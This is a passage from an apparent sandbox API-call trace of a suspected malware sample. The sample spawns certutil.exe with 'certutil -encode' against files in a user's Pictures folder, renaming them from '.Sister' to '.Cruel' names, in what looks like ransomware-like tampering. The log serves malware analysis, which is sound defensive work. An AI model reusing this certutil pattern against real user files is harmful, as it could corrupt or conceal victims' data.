pStreamInfo=0x0) returned 0x1d1f94f2ec0 [0302.637] CryptMsgUpdate (hCryptMsg=0x1d1f94f2ec0, pbData=0x1d1f95122b0, cbData=0x10023, fFinal=1) returned 0 [0302.637] GetLastError () returned 0x8009310b [0302.637] CryptMsgClose (hCryptMsg=0x1d1f94f2ec0) returned 1 [0302.637] GetFileAttributesExW (in: lpFileName="tust f-S-Eq-29XvQ_R.png.Sister" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png.sister"), fInfoLevelId=0x0, lpFileInformation=0x3fe75af040 | out: lpFileInformation=0x3fe75af040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9fef870, ftCreationTime.dwHighDateTime=0x1d5e455, ftLastAccessTime.dwLowDateTime=0xb6eff3a0, ftLastAccessTime.dwHighDateTime=0x1d5f0c5, ftLastWriteTime.dwLowDateTime=0xb6eff3a0, ftLastWriteTime.dwHighDateTime=0x1d5f0c5, nFileSizeHigh=0x0, nFileSizeLow=0x10023)) returned 1 [0302.638] _vsnwprintf (in: _Buffer=0x3fe75af048, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af038 | out: _Buffer="359") returned 3 [0302.638] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x167, lpBuffer=0x3fe75aee00, cchBufferMax=128 | out: lpBuffer="Input Length = %d") returned 0x11 [0302.638] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1d1f9511e50 [0302.638] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.638] _vsnwprintf (in: _Buffer=0x3fe75ae030, _BufferCount=0x1ff, _Format="Input Length = %d", _ArgList=0x3fe75af088 | out: _Buffer="Input Length = 65571") returned 20 [0302.638] GetFileType (hFile=0x50) returned 0x2 [0302.638] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae030*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x3fe75adfe4, lpReserved=0x0 | out: lpBuffer=0x3fe75ae030*, lpNumberOfCharsWritten=0x3fe75adfe4*=0x14) returned 1 [0302.640] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.640] _vsnwprintf (in: _Buffer=0x3fe75ae030, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fe75af088 | out: _Buffer="\n") returned 1 [0302.640] GetFileType (hFile=0x50) returned 0x2 [0302.640] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae030*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fe75adfe4, lpReserved=0x0 | out: lpBuffer=0x3fe75ae030*, lpNumberOfCharsWritten=0x3fe75adfe4*=0x1) returned 1 [0302.670] GetFileAttributesExW (in: lpFileName="tust f-S-Eq-29XvQ_R.png.Cruel" (normalized: "c:\\users\\fd1hvy\\pictures\\tust f-s-eq-29xvq_r.png.cruel"), fInfoLevelId=0x0, lpFileInformation=0x3fe75af040 | out: lpFileInformation=0x3fe75af040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf012b84, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0xdf012b84, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xdf036f92, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x1606a)) returned 1 [0302.670] _vsnwprintf (in: _Buffer=0x3fe75af048, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af038 | out: _Buffer="361") returned 3 [0302.670] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x169, lpBuffer=0x3fe75aee00, cchBufferMax=128 | out: lpBuffer="Output Length = %d") returned 0x12 [0302.670] LocalAlloc (uFlags=0x0, uBytes=0x26) returned 0x1d1f9511ee0 [0302.670] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.670] _vsnwprintf (in: _Buffer=0x3fe75ae030, _BufferCount=0x1ff, _Format="Output Length = %d", _ArgList=0x3fe75af088 | out: _Buffer="Output Length = 90218") returned 21 [0302.670] GetFileType (hFile=0x50) returned 0x2 [0302.670] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae030*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x3fe75adfe4, lpReserved=0x0 | out: lpBuffer=0x3fe75ae030*, lpNumberOfCharsWritten=0x3fe75adfe4*=0x15) returned 1 [0302.672] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.672] _vsnwprintf (in: _Buffer=0x3fe75ae030, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fe75af088 | out: _Buffer="\n") returned 1 [0302.672] GetFileType (hFile=0x50) returned 0x2 [0302.672] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae030*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fe75adfe4, lpReserved=0x0 | out: lpBuffer=0x3fe75ae030*, lpNumberOfCharsWritten=0x3fe75adfe4*=0x1) returned 1 [0302.677] LocalFree (hMem=0x1d1f95122b0) returned 0x0 [0302.678] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0302.678] _vsnwprintf (in: _Buffer=0x3fe75af0a8, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af098 | out: _Buffer="2022") returned 4 [0302.678] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x7e6, lpBuffer=0x3fe75aee60, cchBufferMax=128 | out: lpBuffer="%ws: -%ws command completed successfully.") returned 0x29 [0302.678] LocalAlloc (uFlags=0x0, uBytes=0x54) returned 0x1d1f94e8ac0 [0302.678] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.678] _vsnwprintf (in: _Buffer=0x3fe75ae090, _BufferCount=0x1ff, _Format="%ws: -%ws command completed successfully.", _ArgList=0x3fe75af0e8 | out: _Buffer="CertUtil: -encode command completed successfully.") returned 49 [0302.678] GetFileType (hFile=0x50) returned 0x2 [0302.678] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae090*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x3fe75ae044, lpReserved=0x0 | out: lpBuffer=0x3fe75ae090*, lpNumberOfCharsWritten=0x3fe75ae044*=0x31) returned 1 [0302.679] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0302.679] _vsnwprintf (in: _Buffer=0x3fe75ae090, _BufferCount=0x1ff, _Format="\n", _ArgList=0x3fe75af0e8 | out: _Buffer="\n") returned 1 [0302.679] GetFileType (hFile=0x50) returned 0x2 [0302.679] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x3fe75ae090*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x3fe75ae044, lpReserved=0x0 | out: lpBuffer=0x3fe75ae090*, lpNumberOfCharsWritten=0x3fe75ae044*=0x1) returned 1 [0302.685] LocalFree (hMem=0x0) returned 0x0 [0302.685] LocalFree (hMem=0x1d1f94e4440) returned 0x0 [0302.685] LocalFree (hMem=0x1d1f94f0820) returned 0x0 [0302.685] SetLastError (dwErrCode=0x80070716) [0302.686] _vsnwprintf (in: _Buffer=0x3fe75af118, _BufferCount=0xb, _Format="%d", _ArgList=0x3fe75af108 | out: _Buffer="511") returned 3 [0302.686] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1ff, lpBuffer=0x3fe75aeed0, cchBufferMax=128 | out: lpBuffer="Command Succeeded") returned 0x11 [0302.686] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x1d1f9511d90 [0302.686] PostQuitMessage (nExitCode=0) [0302.686] GetMessageW (in: lpMsg=0x3fe75af710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x3fe75af710) returned 0 [0302.686] LocalFree (hMem=0x1d1f94fb920) returned 0x0 [0302.686] LocalFree (hMem=0x1d1f95120f0) returned 0x0 [0302.686] LocalFree (hMem=0x0) returned 0x0 [0302.686] GetModuleHandleW (lpModuleName="certadm.dll") returned 0x0 [0302.687] GetLastError () returned 0x7e [0302.687] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0302.688] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0302.688] DllMain () returned 0x1 [0302.688] LocalFree (hMem=0x1d1f94fb7a0) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f94ec040) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f9511e50) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f9511ee0) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f94e8ac0) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f9511d90) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f9504c80) returned 0x0 [0302.688] LocalFree (hMem=0x1d1f94ec340) returned 0x0 [0302.688] GetModuleHandleW (lpModuleName="certenroll.dll") returned 0x0 [0302.688] GetLastError () returned 0x7e [0302.688] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0302.689] GetProcAddress (hModule=0x7ffcdebe0000, lpProcName="DllMain") returned 0x7ffcdebe1530 [0302.689] DllMain () returned 0x1 [0302.689] exit (_Code=0) Thread: id = 136 os_tid = 0xee4 Process: id = "55" image_name = "certutil.exe" filename = "c:\\windows\\system32\\certutil.exe" page_root = "0x28651000" os_pid = "0xf4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x1190" cmd_line = "certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"" cur_dir = "C:\\Users\\FD1HVy\\Pictures\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 137 os_tid = 0xec4 [0303.319] GetStartupInfoW (in: lpStartupInfo=0xa0bce8fd80 | out: lpStartupInfo=0xa0bce8fd80*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0303.321] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff70ad80000 [0303.322] __set_app_type (_Type=0x1) [0303.322] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff70ae6cd90) returned 0x0 [0303.322] __wgetmainargs (in: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8, _DoWildCard=0, _StartInfo=0x7ff70aed38b4 | out: _Argc=0x7ff70aed3898, _Argv=0x7ff70aed38a0, _Env=0x7ff70aed38a8) returned 0 [0303.325] _onexit (_Func=0x7ff70ae745a0) returned 0x7ff70ae745a0 [0303.325] _onexit (_Func=0x7ff70ae746c0) returned 0x7ff70ae746c0 [0303.326] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0303.326] GetProcAddress (hModule=0x7ffce9120000, lpProcName="WerSetFlags") returned 0x7ffce913a530 [0303.326] WerSetFlags () returned 0x0 [0303.327] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0303.327] __iob_func () returned 0x7ffcea2dea00 [0303.327] _fileno (_File=0x7ffcea2dea30) returned 1 [0303.327] _setmode (_FileHandle=1, _Mode=16384) returned 16384 [0303.327] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437" [0303.328] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437" [0303.329] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437" [0303.329] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437" [0303.329] GetConsoleOutputCP () returned 0x1b5 [0303.334] _vsnwprintf (in: _Buffer=0xa0bce8fcf0, _BufferCount=0xb, _Format=".%d", _ArgList=0xa0bce8fc18 | out: _Buffer=".437") returned 4 [0303.335] _wsetlocale (category=2, locale=".437") returned="English_United States.437" [0303.335] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0303.335] GetFileType (hFile=0x50) returned 0x2 [0303.335] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffce9120000 [0303.335] GetProcAddress (hModule=0x7ffce9120000, lpProcName="SetThreadUILanguage") returned 0x7ffce913a990 [0303.335] SetThreadUILanguage (LangId=0x0) returned 0x409 [0303.336] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1=".exe", cchCount1=-1, lpString2=".exe", cchCount2=-1) returned 2 [0303.336] GetCommandLineW () returned="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"" [0303.336] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x210367fb800 [0303.336] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x210367ecdf0 [0303.336] LocalFree (hMem=0x210367fb800) returned 0x0 [0303.336] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x210367ebcd0 [0303.336] LocalAlloc (uFlags=0x0, uBytes=0x22) returned 0x210367eb9a0 [0303.336] LocalFree (hMem=0x210367ebcd0) returned 0x0 [0303.336] LocalFree (hMem=0x210367ecdf0) returned 0x0 [0303.337] LocalFree (hMem=0x0) returned 0x0 [0303.337] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0303.337] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0303.338] GetCommandLineW () returned="certutil -encode \"v9e3P.bmp.Sister\" \"v9e3P.bmp.Cruel\"" [0303.338] LocalAlloc (uFlags=0x0, uBytes=0x12) returned 0x210367fb8c0 [0303.338] GetSystemTime (in: lpSystemTime=0xa0bce8f9e0 | out: lpSystemTime=0xa0bce8f9e0*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x12, wMinute=0x32, wSecond=0x11, wMilliseconds=0x36e)) [0303.338] SystemTimeToFileTime (in: lpSystemTime=0xa0bce8f9e0, lpFileTime=0xa0bce8f9d8 | out: lpFileTime=0xa0bce8f9d8) returned 1 [0303.338] FileTimeToLocalFileTime (in: lpFileTime=0xa0bce8f9d8, lpLocalFileTime=0xa0bce8f9a0 | out: lpLocalFileTime=0xa0bce8f9a0) returned 1 [0303.338] FileTimeToSystemTime (in: lpFileTime=0xa0bce8f9a0, lpSystemTime=0xa0bce8f710 | out: lpSystemTime=0xa0bce8f710) returned 1 [0303.338] GetDateFormatW (in: Locale=0x400, dwFlags=0x1, lpDate=0xa0bce8f710, lpFormat=0x0, lpDateStr=0xa0bce8f820, cchDate=128 | out: lpDateStr="4/16/2020") returned 10 [0303.338] GetTimeFormatW (in: Locale=0x400, dwFlags=0x2, lpTime=0xa0bce8f710, lpFormat=0x0, lpTimeStr=0xa0bce8f720, cchTime=128 | out: lpTimeStr="8:50 PM") returned 8 [0303.339] _vsnwprintf (in: _Buffer=0xa0bce8f72e, _BufferCount=0x78, _Format=" %02u.%03us", _ArgList=0xa0bce8f6f8 | out: _Buffer=" 17.878s") returned 8 [0303.339] LocalAlloc (uFlags=0x0, uBytes=0x34) returned 0x210367fdfc0 [0303.339] SetLastError (dwErrCode=0x80070716) [0303.339] _vsnwprintf (in: _Buffer=0xa0bce8f7a8, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f798 | out: _Buffer="948") returned 3 [0303.339] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x3b4, lpBuffer=0xa0bce8f560, cchBufferMax=128 | out: lpBuffer="Begin") returned 0x5 [0303.339] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0x210367fb440 [0303.339] LocalAlloc (uFlags=0x0, uBytes=0x640) returned 0x210367f4480 [0303.339] LocalFree (hMem=0x210367fdfc0) returned 0x0 [0303.339] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xa0bce8fa50 | out: lpSystemTimeAsFileTime=0xa0bce8fa50*(dwLowDateTime=0xdf69de5e, dwHighDateTime=0x1d6141f)) [0303.340] GetLocalTime (in: lpSystemTime=0xa0bce8fa88 | out: lpSystemTime=0xa0bce8fa88*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x4, wDay=0x10, wHour=0x14, wMinute=0x32, wSecond=0x11, wMilliseconds=0x370)) [0303.340] SystemTimeToFileTime (in: lpSystemTime=0xa0bce8fa88, lpFileTime=0xa0bce8fa60 | out: lpFileTime=0xa0bce8fa60) returned 1 [0303.340] CompareFileTime (lpFileTime1=0xa0bce8fa60, lpFileTime2=0xa0bce8fa50) returned 1 [0303.340] _vsnwprintf (in: _Buffer=0xa0bce8fa98, _BufferCount=0x13, _Format="GMT %s %.2f", _ArgList=0xa0bce8fa28 | out: _Buffer="GMT + 2.00") returned 10 [0303.340] LocalFree (hMem=0x210367fb8c0) returned 0x0 [0303.340] GetModuleHandleW (lpModuleName="certca.dll") returned 0x7ffcde520000 [0303.341] FindResourceW (hModule=0x7ffcde520000, lpName=0x1, lpType=0x10) returned 0x7ffcde5e0090 [0303.341] LoadResource (hModule=0x7ffcde520000, hResInfo=0x7ffcde5e0090) returned 0x7ffcde5e00b0 [0303.341] LockResource (hResData=0x7ffcde5e00b0) returned 0x7ffcde5e00b0 [0303.341] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="VS_VERSION_INFO", cchCount1=-1, lpString2="VS_VERSION_INFO", cchCount2=-1) returned 2 [0303.341] _vsnwprintf (in: _Buffer=0x7ff70aed6890, _BufferCount=0x3f, _Format="%u.%u.%u.%u", _ArgList=0xa0bce8fac8 | out: _Buffer="10.0.15063.447") returned 14 [0303.341] GetACP () returned 0x4e4 [0303.341] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0303.341] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x210367fb660 [0303.341] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x210367fb660, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0303.341] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x210367fe380 [0303.341] _vsnwprintf (in: _Buffer=0x210367fe380, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa0bce8fb18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0303.341] LocalFree (hMem=0x210367fb660) returned 0x0 [0303.341] LocalFree (hMem=0x0) returned 0x0 [0303.341] GetModuleHandleW (lpModuleName="certcli.dll") returned 0x7ffcdebe0000 [0303.341] GetACP () returned 0x4e4 [0303.341] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0303.342] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x210367fb660 [0303.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x210367fb660, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0303.342] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x210367fdd00 [0303.342] _vsnwprintf (in: _Buffer=0x210367fdd00, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa0bce8fb18 | out: _Buffer="10.0.15063.447 retail") returned 21 [0303.342] LocalFree (hMem=0x210367fb660) returned 0x0 [0303.342] LocalFree (hMem=0x0) returned 0x0 [0303.342] GetACP () returned 0x4e4 [0303.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0303.342] LocalAlloc (uFlags=0x0, uBytes=0x10) returned 0x210367fb840 [0303.342] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x7ff70ae9f388, cbMultiByte=-1, lpWideCharStr=0x210367fb840, cchWideChar=7 | out: lpWideCharStr="retail") returned 7 [0303.342] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x210367fe2c0 [0303.342] _vsnwprintf (in: _Buffer=0x210367fe2c0, _BufferCount=0x15, _Format="%ws %ws", _ArgList=0xa0bce8fb48 | out: _Buffer="10.0.15063.447 retail") returned 21 [0303.342] LocalFree (hMem=0x210367fb840) returned 0x0 [0303.342] LocalFree (hMem=0x210367fe380) returned 0x0 [0303.342] LocalFree (hMem=0x210367fdd00) returned 0x0 [0303.342] LocalFree (hMem=0x210367fe2c0) returned 0x0 [0303.342] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0303.342] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0303.343] GetStockObject (i=0) returned 0x900010 [0303.343] RegisterClassW (lpWndClass=0xa0bce8fc70) returned 0xc1a2 [0303.343] CreateWindowExW (dwExStyle=0x0, lpClassName="CertUtil", lpWindowName="CertUtil Application", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x7ff70ad80000, lpParam=0x0) returned 0x2b02c8 [0303.438] NtdllDefWindowProc_W () returned 0x0 [0303.438] NtdllDefWindowProc_W () returned 0x1 [0303.447] NtdllDefWindowProc_W () returned 0x0 [0303.459] UpdateWindow (hWnd=0x2b02c8) returned 1 [0303.459] PostMessageW (hWnd=0x2b02c8, Msg=0x400, wParam=0x0, lParam=0x210367e217e) returned 1 [0303.459] GetMessageW (in: lpMsg=0xa0bce8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa0bce8fcc0) returned 1 [0303.459] TranslateMessage (lpMsg=0xa0bce8fcc0) returned 0 [0303.459] DispatchMessageW (lpMsg=0xa0bce8fcc0) returned 0x0 [0303.459] NtdllDefWindowProc_W () returned 0x0 [0303.459] GetMessageW (in: lpMsg=0xa0bce8fcc0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0xa0bce8fcc0) returned 1 [0303.460] TranslateMessage (lpMsg=0xa0bce8fcc0) returned 0 [0303.460] DispatchMessageW (lpMsg=0xa0bce8fcc0) returned 0x0 [0303.460] LocalAlloc (uFlags=0x0, uBytes=0x5a) returned 0x210367f5460 [0303.460] LocalAlloc (uFlags=0x0, uBytes=0x66) returned 0x210367f0cb0 [0303.460] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="p", cchCount2=-1) returned 1 [0303.460] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="pin", cchCount2=-1) returned 1 [0303.460] SetLastError (dwErrCode=0x80070716) [0303.460] _vsnwprintf (in: _Buffer=0xa0bce8f6c8, _BufferCount=0xb, _Format="%d", _ArgList=0xa0bce8f6b8 | out: _Buffer="465") returned 3 [0303.460] LoadStringW (in: hInstance=0x7ff70ad80000, uID=0x1d1, lpBuffer=0xa0bce8f480, cchBufferMax=128 | out: lpBuffer="Command Line") returned 0xc [0303.460] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x210367eba60 [0303.461] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x0 [0303.461] ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z () returned 0x7ff70ad94120 [0303.461] GetEnvironmentVariableW (in: lpName="certsrv_rawhex", lpBuffer=0xa0bce8f460, nSize=0x104 | out: lpBuffer="\x01") returned 0x0 [0303.461] GetLastError () returned 0xcb [0303.461] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0303.461] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0303.462] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0303.462] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0303.462] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0303.462] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0303.462] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0303.462] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0303.462] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0303.462] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0303.462] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0303.462] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0303.462] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0303.462] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0303.462] _wcsnicmp (_String1="Config", _String2="enroll", _MaxCount=0x6) returned -2 [0303.462] _wcsnicmp (_String1="CA", _String2="en", _MaxCount=0x2) returned -2 [0303.462] _wcsnicmp (_String1="Policy", _String2="enroll", _MaxCount=0x6) returned 11 [0303.462] _wcsnicmp (_String1="Exit", _String2="enro", _MaxCount=0x4) returned 10 [0303.462] _wcsnicmp (_String1="Restore", _String2="enroll", _MaxCount=0x7) returned 13 [0303.462] _wcsnicmp (_String1="Template", _String2="enroll", _MaxCount=0x8) returned 15 [0303.462] _wcsnicmp (_String1="Enroll", _String2="enroll", _MaxCount=0x6) returned 0 [0303.462] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Cryptography\\AutoEnrollment", ulOptions=0x0, samDesired=0x20019, phkResult=0xa0bce8f128 | out: phkResult=0xa0bce8f128*=0x23c) returned 0x0 [0303.462] LocalAlloc (uFlags=0x0, uBytes=0x5e) returned 0x210367ef310 [0303.463] RegQueryValueExW (in: hKey=0x23c, lpValueName="RawHex", lpReserved=0x0, lpType=0xa0bce8f698, lpData=0xa0bce8f6c8, lpcbData=0xa0bce8f690*=0x4 | out: lpType=0xa0bce8f698*=0x0, lpData=0xa0bce8f6c8*=0x0, lpcbData=0xa0bce8f690*=0x4) returned 0x2 [0303.463] LocalFree (hMem=0x210367ef310) returned 0x0 [0303.463] RegCloseKey (hKey=0x23c) returned 0x0 [0303.463] LocalFree (hMem=0x0) returned 0x0 [0303.463] CryptFindOIDInfo (dwKeyType=0x1, pvKey=0x7ff70ae80270, dwGroupId=0x7) returned 0x2103680c060 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount1=-1, lpString2="szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL", cchCount2=-1) returned 2 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="stdio", cchCount2=-1) returned 1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="LegacyCertSelectionUI", cchCount2=-1) returned 1 [0303.479] lstrcmpW (lpString1="encode", lpString2="uSAGE") returned -1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="gp", cchCount2=-1) returned 1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="loc", cchCount2=-1) returned 1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="ent", cchCount2=-1) returned 1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="q", cchCount2=-1) returned 1 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dump", cchCount2=-1) returned 3 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="dumpPFX", cchCount2=-1) returned 3 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="asn", cchCount2=-1) returned 3 [0303.479] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="encode", cchCount1=-1, lpString2="", cchCount2=-1) returned 3 [0303.479] CompareStringW (Locale=0x7f, 